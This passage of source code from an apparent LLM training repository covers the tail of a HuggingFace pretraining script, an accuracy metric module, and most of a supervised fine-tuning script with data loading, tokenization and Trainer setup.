training_args.log_level is passive, so we set log level at info here to have that default. transformers.utils.logging.set_verbosity_info() log_level = training_args.get_process_log_level() logger.setLevel(log_level) datasets.utils.logging.set_verbosity(log_level) transformers.utils.logging.set_verbosity(log_level) transformers.utils.logging.enable_default_handler() transformers.utils.logging.enable_explicit_format() # Log on each process the small summary: logger.warning( f"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu}" + f"distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}" ) logger.info(f"Training/evaluation parameters {training_args}") # Detecting last checkpoint. last_checkpoint = None if os.path.isdir(training_args.output_dir) and training_args.do_train and not training_args.overwrite_output_dir: last_checkpoint = get_last_checkpoint(training_args.output_dir) if last_checkpoint is None and len(os.listdir(training_args.output_dir)) > 0: raise ValueError( f"Output directory ({training_args.output_dir}) already exists and is not empty. 
" "Use --overwrite_output_dir to overcome." ) elif last_checkpoint is not None and training_args.resume_from_checkpoint is None: logger.info( f"Checkpoint detected, resuming training at {last_checkpoint}. To avoid this behavior, change " "the `--output_dir` or add `--overwrite_output_dir` to train from scratch." ) # Set seed before initializing model. set_seed(training_args.seed) # Get the datasets: you can either provide your own CSV/JSON/TXT training and evaluation files (see below) # or just provide the name of one of the public datasets available on the hub at https://huggingface.co/datasets/ # (the dataset will be downloaded automatically from the datasets Hub). # # For CSV/JSON files, this script will use the column called 'text' or the first column if no column called # 'text' is found. You can easily tweak this behavior (see below). # # In distributed training, the load_dataset function guarantee that only one local process can concurrently # download the dataset. if True: data_files = {} dataset_args = {} if data_args.train_files is not None: print(data_args.train_files) data_files["train"] = data_args.train_files print('训练文件总个数',len(data_args.train_files)) if data_args.validation_files is not None: data_files["validation"] = data_args.validation_files extension = ( data_files["train"][0].split(".")[-1] if data_files["train"] is not None else data_args.validation_files.split(".")[-1] ) if extension == "txt": extension = "text" dataset_args["keep_linebreaks"] = data_args.keep_linebreaks raw_datasets = load_dataset( extension, data_files=data_files, streaming=data_args.streaming, cache_dir=os.path.join(training_args.output_dir,'dataset_cache'), use_auth_token=True if model_args.use_auth_token else None, **dataset_args, ) if data_args.streaming: raw_datasets = raw_datasets.shuffle(seed=training_args.seed, buffer_size=1000000) # If no validation data is there, validation_split_percentage will be used to divide the dataset. if "validation" not in raw_datasets.keys(): raw_datasets["validation"] = load_dataset( extension, data_files=data_files, split=f"train[:{data_args.validation_split_percentage}%]", cache_dir=model_args.cache_dir, use_auth_token=True if model_args.use_auth_token else None, **dataset_args, ) raw_datasets["train"] = load_dataset( extension, data_files=data_files, split=f"train[{data_args.validation_split_percentage}%:]", cache_dir=model_args.cache_dir, use_auth_token=True if model_args.use_auth_token else None, **dataset_args, ) # See more about loading any type of standard or custom dataset (from files, python dict, pandas DataFrame, etc) at # https://huggingface.co/docs/datasets/loading_datasets.html. # Load pretrained model and tokenizer # # Distributed training: # The .from_pretrained methods guarantee that only one local process can concurrently # download model & vocab. 
config_kwargs = { "cache_dir": model_args.cache_dir, "revision": model_args.model_revision, "use_auth_token": True if model_args.use_auth_token else None, } if model_args.config_name: config = AutoConfig.from_pretrained(model_args.config_name, **config_kwargs) elif model_args.model_name_or_path: config = AutoConfig.from_pretrained(model_args.model_name_or_path, **config_kwargs) else: config = CONFIG_MAPPING[model_args.model_type]() logger.warning("You are instantiating a new config instance from scratch.") if model_args.config_overrides is not None: logger.info(f"Overriding config: {model_args.config_overrides}") config.update_from_string(model_args.config_overrides) logger.info(f"New config: {config}") print(training_args.local_rank,'start load tokenizer') tokenizer_kwargs = { "cache_dir": model_args.cache_dir, "use_fast": model_args.use_fast_tokenizer, "revision": model_args.model_revision, "use_auth_token": True if model_args.use_auth_token else None, } if model_args.tokenizer_name: tokenizer = AutoTokenizer.from_pretrained(model_args.tokenizer_name, **tokenizer_kwargs) elif model_args.model_name_or_path: tokenizer = AutoTokenizer.from_pretrained(model_args.model_name_or_path, **tokenizer_kwargs) else: raise ValueError( "You are instantiating a new tokenizer from scratch. This is not supported by this script." "You can do it from another script, save it, and load it from here, using --tokenizer_name." ) print(training_args.local_rank,'end load tokenizer') print(training_args.local_rank,'start load model') if model_args.model_name_or_path: torch_dtype = ( model_args.torch_dtype if model_args.torch_dtype in ["auto", None] else getattr(torch, model_args.torch_dtype) ) model = AutoModelForCausalLM.from_pretrained( model_args.model_name_or_path, from_tf=bool(".ckpt" in model_args.model_name_or_path), config=config, cache_dir=model_args.cache_dir, revision=model_args.model_revision, trust_remote_code=True, use_flash_attention_2=True, use_auth_token=True if model_args.use_auth_token else None, ) else: model = AutoModelForCausalLM.from_config(config,trust_remote_code=True) n_params = sum({p.data_ptr(): p.numel() for p in model.parameters()}.values()) logger.info(f"Training new model from scratch - Total size={n_params/2**20:.2f}M params") print(training_args.local_rank,'end load model') # We resize the embeddings only when necessary to avoid index errors. If you are creating a model from scratch # on a small vocab and want a smaller embedding size, remove this test. embedding_size = model.get_input_embeddings().weight.shape[0] if len(tokenizer) > embedding_size: model.resize_token_embeddings(len(tokenizer)) # Preprocessing the datasets. # First we tokenize all the texts. 
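    # Two-stage preprocessing follows: (1) tokenize the raw text column, (2) concatenate the
    # token ids and re-chunk them into fixed block_size windows (see group_texts below), with
    # labels copied from input_ids for causal-LM training. Column names come from the dataset
    # features, or from the first few streamed records when --streaming is enabled.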
if training_args.do_train: if data_args.streaming: dataset_head = raw_datasets["train"].take(3) print(list(dataset_head)) column_names = list(list(dataset_head)[0].keys()) else: column_names = list(raw_datasets["train"].features) else: if data_args.streaming: dataset_head = raw_datasets["validation"].take(3) column_names = list(list(dataset_head)[0].keys()) else: column_names = list(raw_datasets["validation"].features) print(column_names) text_column_name = "text" if "text" in column_names else column_names[0] # since this will be pickled to avoid _LazyModule error in Hasher force logger loading before tokenize_function tok_logger = transformers.utils.logging.get_logger("transformers.tokenization_utils_base") def tokenize_function(examples): with CaptureLogger(tok_logger) as cl: output = tokenizer( [ item for item in examples[text_column_name]]) return output with training_args.main_process_first(desc="dataset map tokenization"): if not data_args.streaming: tokenized_datasets = raw_datasets.map( tokenize_function, batched=True, num_proc=data_args.preprocessing_num_workers, remove_columns=column_names, load_from_cache_file=not data_args.overwrite_cache, desc="Running tokenizer on dataset", ) else: tokenized_datasets = raw_datasets.map( tokenize_function, batched=True, remove_columns=column_names, batch_size = 60000, ) if data_args.block_size is None: block_size = tokenizer.model_max_length if block_size > 1024: logger.warning( "The chosen tokenizer supports a `model_max_length` that is longer than the default `block_size` value" " of 1024. If you would like to use a longer `block_size` up to `tokenizer.model_max_length` you can" " override this default with `--block_size xxx`." ) block_size = 1024 else: if data_args.block_size > tokenizer.model_max_length: logger.warning( f"The block_size passed ({data_args.block_size}) is larger than the maximum length for the model" f"({tokenizer.model_max_length}). Using block_size={tokenizer.model_max_length}." ) block_size = min(data_args.block_size, tokenizer.model_max_length) # Main data processing function that will concatenate all texts from our dataset and generate chunks of block_size. def group_texts(examples): # Concatenate all texts. concatenated_examples = {k: list(chain(*examples[k])) for k in examples.keys()} # concatenated_examples = {k: sum(examples[k], []) for k in examples.keys()} total_length = len(concatenated_examples[list(examples.keys())[0]]) # We drop the small remainder, we could add padding if the model supported it instead of this drop, you can # customize this part to your needs. if total_length >= block_size: total_length = (total_length // block_size) * block_size # Split by chunks of max_len. result = { k: [t[i : i + block_size] for i in range(0, total_length, block_size)] for k, t in concatenated_examples.items() } # print(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')) logger.info("group texts input examples length%d after_group size%d"%(len(examples['input_ids']),len(result["input_ids"]))) result["labels"] = result["input_ids"].copy() return result # Note that with `batched=True`, this map processes 1,000 texts together, so group_texts throws away a remainder # for each of those groups of 1,000 texts. You can adjust that batch_size here but a higher value might be slower # to preprocess. # # To speed up this part, we use multiprocessing. 
See the documentation of the map method for more information: # https://huggingface.co/docs/datasets/package_reference/main_classes.html#datasets.Dataset.map with training_args.main_process_first(desc="grouping texts together"): if not data_args.streaming: lm_datasets = tokenized_datasets.map( group_texts, batched=True, num_proc=data_args.preprocessing_num_workers, load_from_cache_file=not data_args.overwrite_cache, desc=f"Grouping texts in chunks of {block_size}", batch_size = 40000, ) else: lm_datasets = tokenized_datasets.map( group_texts, batched=True, batch_size = 60000, ) print(training_args.local_rank,'start select train_dataset') if training_args.do_train: if "train" not in tokenized_datasets: raise ValueError("--do_train requires a train dataset") train_dataset = lm_datasets["train"] if data_args.max_train_samples is not None and data_args.streaming==False: max_train_samples = min(len(train_dataset), data_args.max_train_samples) train_dataset = train_dataset.select(range(max_train_samples)) print(training_args.local_rank,'end select train_dataset') if training_args.do_eval: if "validation" not in tokenized_datasets: raise ValueError("--do_eval requires a validation dataset") print(training_args.local_rank,'start select eval_dataset') eval_dataset = lm_datasets["validation"] if data_args.max_eval_samples is not None and data_args.streaming==False : max_eval_samples = min(len(eval_dataset), data_args.max_eval_samples) eval_dataset = eval_dataset.select(range(max_eval_samples)) print(training_args.local_rank,'end select eval_dataset') def preprocess_logits_for_metrics(logits, labels): if isinstance(logits, tuple): # Depending on the model and config, logits may contain extra tensors, # like past_key_values, but logits always come first logits = logits[0] return logits.argmax(dim=-1) print(training_args.local_rank,'start load metric') metric = evaluate.load("accuracy.py") print(training_args.local_rank,'end load metric') def compute_metrics(eval_preds): preds, labels = eval_preds # preds have the same shape as the labels, after the argmax(-1) has been calculated # by preprocess_logits_for_metrics but we need to shift the labels labels = labels[:, 1:].reshape(-1) preds = preds[:, :-1].reshape(-1) return metric.compute(predictions=preds, references=labels) print(training_args.local_rank,'Initialize our Trainer') trainer = Trainer( model=model, args=training_args, train_dataset= IterableWrapper(train_dataset) if training_args.do_train else None, eval_dataset= IterableWrapper(eval_dataset) if training_args.do_eval else None, tokenizer=tokenizer, # Data collator will default to DataCollatorWithPadding, so we change it. 
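        # default_data_collator simply stacks the fixed-length blocks produced by group_texts,
        # so no dynamic padding is needed for the pretraining batches.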
data_collator=default_data_collator, compute_metrics=compute_metrics if training_args.do_eval and not is_torch_tpu_available() else None, preprocess_logits_for_metrics=preprocess_logits_for_metrics if training_args.do_eval and not is_torch_tpu_available()else None, # callbacks=([SavePeftModelCallback] if isinstance(model, PeftModel) else None), ) if training_args.do_train: checkpoint = None if training_args.resume_from_checkpoint is not None: checkpoint = training_args.resume_from_checkpoint elif last_checkpoint is not None: checkpoint = last_checkpoint print(training_args.local_rank,'start train') train_result = trainer.train(resume_from_checkpoint=checkpoint) trainer.save_model() # Saves the tokenizer too for easy upload metrics = train_result.metrics max_train_samples = ( data_args.max_train_samples if data_args.max_train_samples is not None else len(train_dataset) ) metrics["train_samples"] = min(max_train_samples, len(train_dataset)) trainer.log_metrics("train", metrics) trainer.save_metrics("train", metrics) trainer.save_state() # Evaluation if training_args.do_eval: logger.info("*** Evaluate ***") metrics = trainer.evaluate() max_eval_samples = data_args.max_eval_samples if data_args.max_eval_samples is not None else len(eval_dataset) metrics["eval_samples"] = min(max_eval_samples, len(eval_dataset)) try: perplexity = math.exp(metrics["eval_loss"]) except OverflowError: perplexity = float("inf") metrics["perplexity"] = perplexity trainer.log_metrics("eval", metrics) trainer.save_metrics("eval", metrics) def _mp_fn(index): # For xla_spawn (TPUs) main() if __name__ == "__main__": main() File: train/pretrain/accuracy.py # Copyright 2020 The HuggingFace Datasets Authors and the current dataset script contributor. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Accuracy metric.""" import datasets from sklearn.metrics import accuracy_score import evaluate _DESCRIPTION = """ Accuracy is the proportion of correct predictions among the total number of cases processed. It can be computed with: Accuracy = (TP + TN) / (TP + TN + FP + FN) Where: TP: True positive TN: True negative FP: False positive FN: False negative """ _KWARGS_DESCRIPTION = """ Args: predictions (`list` of `int`): Predicted labels. references (`list` of `int`): Ground truth labels. normalize (`boolean`): If set to False, returns the number of correctly classified samples. Otherwise, returns the fraction of correctly classified samples. Defaults to True. sample_weight (`list` of `float`): Sample weights Defaults to None. Returns: accuracy (`float` or `int`): Accuracy score. Minimum possible value is 0. Maximum possible value is 1.0, or the number of examples input, if `normalize` is set to `True`.. A higher score means higher accuracy. Examples: Example 1-A simple example >>> accuracy_metric = evaluate.load("accuracy") >>> results = accuracy_metric.compute(references=[0, 1, 2, 0, 1, 2], predictions=[0, 1, 1, 2, 1, 0]) >>> print(results) {'accuracy': 0.5} Example 2-The same as Example 1, except with `normalize` set to `False`. 
>>> accuracy_metric = evaluate.load("accuracy") >>> results = accuracy_metric.compute(references=[0, 1, 2, 0, 1, 2], predictions=[0, 1, 1, 2, 1, 0], normalize=False) >>> print(results) {'accuracy': 3.0} Example 3-The same as Example 1, except with `sample_weight` set. >>> accuracy_metric = evaluate.load("accuracy") >>> results = accuracy_metric.compute(references=[0, 1, 2, 0, 1, 2], predictions=[0, 1, 1, 2, 1, 0], sample_weight=[0.5, 2, 0.7, 0.5, 9, 0.4]) >>> print(results) {'accuracy': 0.8778625954198473} """ _CITATION = """ @article{scikit-learn, title={Scikit-learn: Machine Learning in {P}ython}, author={Pedregosa, F. and Varoquaux, G. and Gramfort, A. and Michel, V. and Thirion, B. and Grisel, O. and Blondel, M. and Prettenhofer, P. and Weiss, R. and Dubourg, V. and Vanderplas, J. and Passos, A. and Cournapeau, D. and Brucher, M. and Perrot, M. and Duchesnay, E.}, journal={Journal of Machine Learning Research}, volume={12}, pages={2825--2830}, year={2011} } """ @evaluate.utils.file_utils.add_start_docstrings(_DESCRIPTION, _KWARGS_DESCRIPTION) class Accuracy(evaluate.Metric): def _info(self): return evaluate.MetricInfo( description=_DESCRIPTION, citation=_CITATION, inputs_description=_KWARGS_DESCRIPTION, features=datasets.Features( { "predictions": datasets.Sequence(datasets.Value("int32")), "references": datasets.Sequence(datasets.Value("int32")), } if self.config_name == "multilabel" else { "predictions": datasets.Value("int32"), "references": datasets.Value("int32"), } ), reference_urls=["https://scikit-learn.org/stable/modules/generated/sklearn.metrics.accuracy_score.html"], ) def _compute(self, predictions, references, normalize=True, sample_weight=None): return { "accuracy": float( accuracy_score(references, predictions, normalize=normalize, sample_weight=sample_weight) ) } File: train/sft/finetune_clm.py #!/usr/bin/env python # coding=utf-8 # Copyright 2020 The HuggingFace Inc. team. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Fine-tuning the library models for causal language modeling (GPT, GPT-2, CTRL, ...) on a text file or a dataset. Here is the full list of checkpoints on the hub that can be fine-tuned by this script: https://huggingface.co/models?filter=text-generation """ # You can also adapt this script on your own causal language modeling task. Pointers for this are left as comments. 
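# A minimal launch sketch (hypothetical paths and values; assumes a torchrun/deepspeed-style
# multi-GPU launcher, which this file does not prescribe):
#   torchrun --nproc_per_node=8 finetune_clm.py \
#       --model_name_or_path /path/to/llama --train_files data/train.csv \
#       --validation_files data/dev.csv --block_size 2048 \
#       --do_train --do_eval --output_dir output/
# All flags are parsed by HfArgumentParser into the ModelArguments, DataTrainingArguments
# and TrainingArguments dataclasses defined or imported below.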
import logging import math import os import sys import random from dataclasses import dataclass, field from itertools import chain import deepspeed from typing import Optional,List,Union import datasets import evaluate import torch from datasets import load_dataset from peft import ( # noqa: E402 LoraConfig, PeftModel, get_peft_model, get_peft_model_state_dict, prepare_model_for_int8_training, prepare_model_for_kbit_training, set_peft_model_state_dict, ) import transformers from transformers.trainer_utils import PREFIX_CHECKPOINT_DIR from transformers import ( CONFIG_MAPPING, MODEL_FOR_CAUSAL_LM_MAPPING, AutoConfig, AutoModelForCausalLM, AutoTokenizer, TrainerCallback, TrainerState, TrainerControl, HfArgumentParser, Trainer, TrainingArguments, default_data_collator, BitsAndBytesConfig, is_torch_tpu_available, set_seed, ) from transformers.testing_utils import CaptureLogger from transformers.trainer_utils import get_last_checkpoint from transformers.utils import check_min_version, send_example_telemetry from transformers.utils.versions import require_version import pdb # Will error if the minimal version of Transformers is not installed. Remove at your own risks. # check_min_version("4.27.0.dev0") require_version("datasets>=1.8.0", "To fix: pip install -r examples/pytorch/language-modeling/requirements.txt") logger = logging.getLogger(__name__) MODEL_CONFIG_CLASSES = list(MODEL_FOR_CAUSAL_LM_MAPPING.keys()) MODEL_TYPES = tuple(conf.model_type for conf in MODEL_CONFIG_CLASSES) @dataclass class ModelArguments: """ Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch. """ model_name_or_path: Optional[str] = field( default=None, metadata={ "help": ( "The model checkpoint for weights initialization.Don't set if you want to train a model from scratch." ) }, ) model_type: Optional[str] = field( default=None, metadata={"help": "If training from scratch, pass a model type from the list: " + ", ".join(MODEL_TYPES)}, ) config_overrides: Optional[str] = field( default=None, metadata={ "help": ( "Override some existing default config settings when a model is trained from scratch. Example: " "n_embd=10,resid_pdrop=0.2,scale_attn_weights=false,summary_type=cls_index" ) }, ) config_name: Optional[str] = field( default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"} ) tokenizer_name: Optional[str] = field( default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"} ) cache_dir: Optional[str] = field( default=None, metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"}, ) use_fast_tokenizer: bool = field( default=True, metadata={"help": "Whether to use one of the fast tokenizer (backed by the tokenizers library) or not."}, ) model_revision: str = field( default="main", metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."}, ) use_auth_token: bool = field( default=False, metadata={ "help": ( "Will use the token generated when running `huggingface-cli login` (necessary to use this script " "with private models)." ) }, ) torch_dtype: Optional[str] = field( default=None, metadata={ "help": ( "Override the default `torch.dtype` and load the model under this dtype. If `auto` is passed, the " "dtype will be automatically derived from the model's weights." 
), "choices": ["auto", "bfloat16", "float16", "float32"], }, ) def __post_init__(self): if self.config_overrides is not None and (self.config_name is not None or self.model_name_or_path is not None): raise ValueError( "--config_overrides can't be used in combination with --config_name or --model_name_or_path" ) @dataclass class DataTrainingArguments: """ Arguments pertaining to what data we are going to input our model for training and eval. """ train_on_inputs: bool = field( default=False, metadata={"help": "Overwrite the cached training and evaluation sets"} ) dataset_name: Optional[str] = field( default=None, metadata={"help": "The name of the dataset to use (via the datasets library)."} ) dataset_config_name: Optional[str] = field( default=None, metadata={"help": "The configuration name of the dataset to use (via the datasets library)."} ) train_files: Optional[List[str]] = field(default=None, metadata={"help": "The input training data file (a text file)."}) validation_files: Optional[List[str]] = field( default=None, metadata={"help": "An optional input evaluation data file to evaluate the perplexity on (a text file)."}, ) max_train_samples: Optional[int] = field( default=None, metadata={ "help": ( "For debugging purposes or quicker training, truncate the number of training examples to this " "value if set." ) }, ) max_eval_samples: Optional[int] = field( default=None, metadata={ "help": ( "For debugging purposes or quicker training, truncate the number of evaluation examples to this " "value if set." ) }, ) streaming: bool = field(default=False, metadata={"help": "Enable streaming mode"}) block_size: Optional[int] = field( default=None, metadata={ "help": ( "Optional input sequence length after tokenization. " "The training dataset will be truncated in block of this size for training. " "Default to the model max input length for single sentence inputs (take into account special tokens)." ) }, ) overwrite_cache: bool = field( default=False, metadata={"help": "Overwrite the cached training and evaluation sets"} ) validation_split_percentage: Optional[int] = field( default=5, metadata={ "help": "The percentage of the train set used as validation set in case there's no validation split" }, ) preprocessing_num_workers: Optional[int] = field( default=None, metadata={"help": "The number of processes to use for the preprocessing."}, ) keep_linebreaks: bool = field( default=True, metadata={"help": "Whether to keep line breaks when using TXT files or not."} ) def __post_init__(self): if self.streaming: require_version("datasets>=2.0.0", "The streaming feature requires `datasets>=2.0.0`") if self.dataset_name is None and self.train_files is None and self.validation_files is None: raise ValueError("Need either a dataset name or a training/validation file.") else: if self.train_files is not None: extension = self.train_files[0].split(".")[-1] assert extension in ["csv", "json", "txt"], "`train_file` should be a csv, a json or a txt file." if self.validation_files is not None: extension = self.validation_files[0].split(".")[-1] assert extension in ["csv", "json", "txt"], "`validation_file` should be a csv, a json or a txt file." def main(): # See all possible arguments in src/transformers/training_args.py # or by passing the --help flag to this script. # We now keep distinct sets of args, for a cleaner separation of concerns. 
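    # Arguments may also be supplied as a single JSON file (e.g. `python finetune_clm.py args.json`),
    # in which case parse_json_file() is used instead of the normal CLI parsing below.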
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments)) # pdb.set_trace() if len(sys.argv) == 2 and sys.argv[1].endswith(".json"): # If we pass only one argument to the script and it's the path to a json file, # let's parse it to get our arguments. model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1])) else: model_args, data_args, training_args = parser.parse_args_into_dataclasses() # Sending telemetry. Tracking the example usage helps us better allocate resources to maintain them. The # information sent is the one passed as arguments along with your Python/PyTorch versions. send_example_telemetry("run_clm", model_args, data_args) # Setup logging logging.basicConfig( format="%(asctime)s - %(levelname)s - %(name)s - %(message)s", datefmt="%m/%d/%Y %H:%M:%S", handlers=[logging.StreamHandler(sys.stdout)], ) if training_args.should_log: # The default of training_args.log_level is passive, so we set log level at info here to have that default. transformers.utils.logging.set_verbosity_info() log_level = training_args.get_process_log_level() logger.setLevel(log_level) datasets.utils.logging.set_verbosity(log_level) transformers.utils.logging.set_verbosity(log_level) transformers.utils.logging.enable_default_handler() transformers.utils.logging.enable_explicit_format() # Log on each process the small summary: logger.warning( f"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu}" + f"distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}" ) logger.info(f"Training/evaluation parameters {training_args}") # Detecting last checkpoint. last_checkpoint = None if os.path.isdir(training_args.output_dir) and training_args.do_train and not training_args.overwrite_output_dir: last_checkpoint = get_last_checkpoint(training_args.output_dir) if last_checkpoint is None and len(os.listdir(training_args.output_dir)) > 0: raise ValueError( f"Output directory ({training_args.output_dir}) already exists and is not empty. " "Use --overwrite_output_dir to overcome." ) elif last_checkpoint is not None and training_args.resume_from_checkpoint is None: logger.info( f"Checkpoint detected, resuming training at {last_checkpoint}. To avoid this behavior, change " "the `--output_dir` or add `--overwrite_output_dir` to train from scratch." ) # Set seed before initializing model. set_seed(training_args.seed) # Get the datasets: you can either provide your own CSV/JSON/TXT training and evaluation files (see below) # or just provide the name of one of the public datasets available on the hub at https://huggingface.co/datasets/ # (the dataset will be downloaded automatically from the datasets Hub). # # For CSV/JSON files, this script will use the column called 'text' or the first column if no column called # 'text' is found. You can easily tweak this behavior (see below). # # In distributed training, the load_dataset function guarantee that only one local process can concurrently # download the dataset. 
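    # CSV/JSON/TXT files passed via --train_files / --validation_files are loaded here; if no
    # validation file is provided, --validation_split_percentage (default 5%) of the training
    # data is split off for evaluation.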
if True: data_files = {} dataset_args = {} if data_args.train_files is not None: data_files["train"] = data_args.train_files if data_args.validation_files is not None: data_files["validation"] = data_args.validation_files extension = ( data_args.train_files[0].split(".")[-1] if data_args.train_files is not None else data_args.validation_files.split(".")[-1] ) if extension == "txt": extension = "text" dataset_args["keep_linebreaks"] = data_args.keep_linebreaks raw_datasets = load_dataset( extension, data_files=data_files, cache_dir=os.path.join(training_args.output_dir,'dataset_cache'), use_auth_token=True if model_args.use_auth_token else None, **dataset_args, ) # If no validation data is there, validation_split_percentage will be used to divide the dataset. if "validation" not in raw_datasets.keys(): raw_datasets["validation"] = load_dataset( extension, data_files=data_files, split=f"train[:{data_args.validation_split_percentage}%]", cache_dir=model_args.cache_dir, use_auth_token=True if model_args.use_auth_token else None, **dataset_args, ) raw_datasets["train"] = load_dataset( extension, data_files=data_files, split=f"train[{data_args.validation_split_percentage}%:]", cache_dir=model_args.cache_dir, use_auth_token=True if model_args.use_auth_token else None, **dataset_args, ) # See more about loading any type of standard or custom dataset (from files, python dict, pandas DataFrame, etc) at # https://huggingface.co/docs/datasets/loading_datasets.html. # Load pretrained model and tokenizer # # Distributed training: # The .from_pretrained methods guarantee that only one local process can concurrently # download model & vocab. config_kwargs = { "cache_dir": model_args.cache_dir, "revision": model_args.model_revision, "use_auth_token": True if model_args.use_auth_token else None, } if model_args.config_name: config = AutoConfig.from_pretrained(model_args.config_name, **config_kwargs) elif model_args.model_name_or_path: config = AutoConfig.from_pretrained(model_args.model_name_or_path, **config_kwargs) else: config = CONFIG_MAPPING[model_args.model_type]() logger.warning("You are instantiating a new config instance from scratch.") if model_args.config_overrides is not None: logger.info(f"Overriding config: {model_args.config_overrides}") config.update_from_string(model_args.config_overrides) logger.info(f"New config: {config}") tokenizer_kwargs = { "cache_dir": model_args.cache_dir, "use_fast": model_args.use_fast_tokenizer, "revision": model_args.model_revision, "use_auth_token": True if model_args.use_auth_token else None, "padding_side":'left' } if model_args.tokenizer_name: tokenizer = AutoTokenizer.from_pretrained(model_args.tokenizer_name, **tokenizer_kwargs) elif model_args.model_name_or_path: tokenizer = AutoTokenizer.from_pretrained(model_args.model_name_or_path, **tokenizer_kwargs) else: raise ValueError( "You are instantiating a new tokenizer from scratch. This is not supported by this script." "You can do it from another script, save it, and load it from here, using --tokenizer_name." 
) tokenizer.pad_token = tokenizer.eos_token if model_args.model_name_or_path: torch_dtype = ( model_args.torch_dtype if model_args.torch_dtype in ["auto", None] else getattr(torch, model_args.torch_dtype) ) print(torch_dtype) torch_dtype = torch.float16 model = AutoModelForCausalLM.from_pretrained( model_args.model_name_or_path, from_tf=bool(".ckpt" in model_args.model_name_or_path), config=config, cache_dir=model_args.cache_dir, revision=model_args.model_revision, use_auth_token=True if model_args.use_auth_token else None, torch_dtype=torch_dtype, trust_remote_code=True, use_flash_attention_2=True, device_map={"": int(os.environ.get("LOCAL_RANK") or 0)} ) # model = prepare_model_for_int8_training(model, output_embedding_layer_name="embed_out", layer_norm_names=[]) else: model = AutoModelForCausalLM.from_config(config) n_params = sum({p.data_ptr(): p.numel() for p in model.parameters()}.values()) logger.info(f"Training new model from scratch - Total size={n_params/2**20:.2f}M params") # We resize the embeddings only when necessary to avoid index errors. If you are creating a model from scratch # on a small vocab and want a smaller embedding size, remove this test. embedding_size = model.get_input_embeddings().weight.shape[0] if len(tokenizer) > embedding_size: model.resize_token_embeddings(len(tokenizer)) # Preprocessing the datasets. # First we tokenize all the texts. if training_args.do_train: column_names = list(raw_datasets["train"].features) else: column_names = list(raw_datasets["validation"].features) train_on_inputs = True if len(column_names)==1: text_column_name = "text" if "text" in column_names else column_names[0] elif len(column_names)==2: input_column_name = 'input' if 'input' in column_names else column_names[0] target_column_name = 'target' if 'target' in column_names else column_names[0] train_on_inputs=False else: raise ValueError('输入文件列数不对') print('train_on_inputs',train_on_inputs) # since this will be pickled to avoid _LazyModule error in Hasher force logger loading before tokenize_function tok_logger = transformers.utils.logging.get_logger("transformers.tokenization_utils_base") def tokenize_function(examples): with CaptureLogger(tok_logger) as cl: output = tokenizer([ item for item in examples[text_column_name]],truncation=True,max_length=data_args.block_size,padding=False,return_tensors=None) output['labels'] = output['input_ids'].copy() return output def tokenize(prompt): result = tokenizer(prompt,truncation=True,max_length=data_args.block_size,padding=False,return_tensors=None) result["labels"] = result["input_ids"].copy() return result def generate_and_tokenize_prompt(data_point): input_text = data_point[input_column_name] target_text = data_point[target_column_name] full_prompt = input_text+target_text tokenized_full_prompt = tokenize(full_prompt) if not train_on_inputs: user_prompt = input_text tokenized_user_prompt = tokenize(user_prompt) user_prompt_len = len(tokenized_user_prompt["input_ids"]) tokenized_full_prompt["labels"] = [ -100 ] * user_prompt_len + tokenized_full_prompt["labels"][ user_prompt_len: ] return tokenized_full_prompt with training_args.main_process_first(desc="dataset map tokenization"): if not data_args.streaming: tokenized_datasets = raw_datasets.map( tokenize_function if train_on_inputs==True else generate_and_tokenize_prompt, batched=True if train_on_inputs==True else False, num_proc=data_args.preprocessing_num_workers, remove_columns=column_names, load_from_cache_file=not data_args.overwrite_cache, desc="Running tokenizer on dataset", 
) else: tokenized_datasets = raw_datasets.map( tokenize_function if train_on_inputs==True else generate_and_tokenize_prompt, batched=True if train_on_inputs==True else False, remove_columns=column_names, ) if data_args.block_size is None: block_size = tokenizer.model_max_length if block_size > 2048: block_size = 2048 else: block_size = min(data_args.block_size, tokenizer.model_max_length) if training_args.do_train: if "train" not in tokenized_datasets: raise ValueError("--do_train requires a train dataset") train_dataset = tokenized_datasets["train"] if data_args.max_train_samples is not None: max_train_samples = min(len(train_dataset), data_args.max_train_samples) train_dataset = train_dataset.select(range(max_train_samples)) for index in random.sample(range(len(train_dataset)), 3): logger.info(f"Sample {index} of the training set: {train_dataset[index]}.") train_dataset = train_dataset.shuffle(seed=training_args.seed) if training_args.do_eval: if "validation" not in tokenized_datasets: raise ValueError("--do_eval requires a validation dataset") eval_dataset = tokenized_datasets["validation"] if data_args.max_eval_samples is not None: max_eval_samples = min(len(eval_dataset), data_args.max_eval_samples) eval_dataset = eval_dataset.select(range(max_eval_samples)) def preprocess_logits_for_metrics(logits, labels): if isinstance(logits, tuple): # Depending on the model and config, logits may contain extra tensors, # like past_key_values, but logits always come first logits = logits[0] return logits.argmax(dim=-1) metric = evaluate.load("accuracy.py") def compute_metrics(eval_preds): preds, labels = eval_preds # preds have the same shape as the labels, after the argmax(-1) has been calculated # by preprocess_logits_for_metrics but we need to shift the labels labels = labels[:, 1:].reshape(-1) # .reshape(-1) preds = preds[:, :-1].reshape(-1) # .reshape(-1) # print(labels.shape) # true_predictions = [ # [p for (p, l) in zip(pred, gold_label) 